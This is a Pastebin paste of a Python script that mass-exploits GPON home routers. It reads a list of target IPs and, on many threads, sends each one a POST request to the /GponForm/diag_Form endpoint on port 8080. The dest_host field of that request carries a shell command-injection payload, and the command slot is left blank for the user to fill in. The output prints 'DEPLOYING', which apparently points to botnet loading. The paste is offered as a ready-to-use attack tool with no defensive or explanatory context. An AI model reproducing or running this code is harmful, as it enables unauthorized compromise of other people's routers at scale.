Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Originally was python 2.x and was disgustingly programmed... So I decided to rewrite it into python 3.x and made it cleaner
- import sys
- import socket
- import threading
- if len(sys.argv) < 2:
- print("Usage: python3 {} [MFU List]".format(sys.argv[0]))
- exit()
- command = "" # Command goes here
- post_data = "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=$({})&ipv=0\r\n".format(command)
- headers = "POST /GponForm/diag_Form?script/ HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUser-Agent: Hello, World\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: "+str(len(post_data))+"\r\n\r\n"+str(post_data)
- def exploit(ip):
- try:
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.connect((ip, 8080))
- sock.send(headers.encode("utf-8"))
- print("\x1b[1;35m[\x1b[1;36mGPON\x1b[1;35m] \x1b[1;37m- \x1b[1;35m[\x1b[1;32m{}\x1b[1;35m] \x1b[1;37m- \x1b[1;35m[\x1b[1;32mDEPLOYING\x1b[1;35m]".format(ip))
- sock.close()
- except:
- pass
- return
- with open(sys.argv[1], "r") as fd:
- lines = fd.readlines()
- print("[+] Loaded: {}".format(len(lines)))
- for line in lines:
- thread = threading.Thread(target=exploit, args=(line.strip(),))
- thread.setDaemon(True)
- thread.start()
- thread.join()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement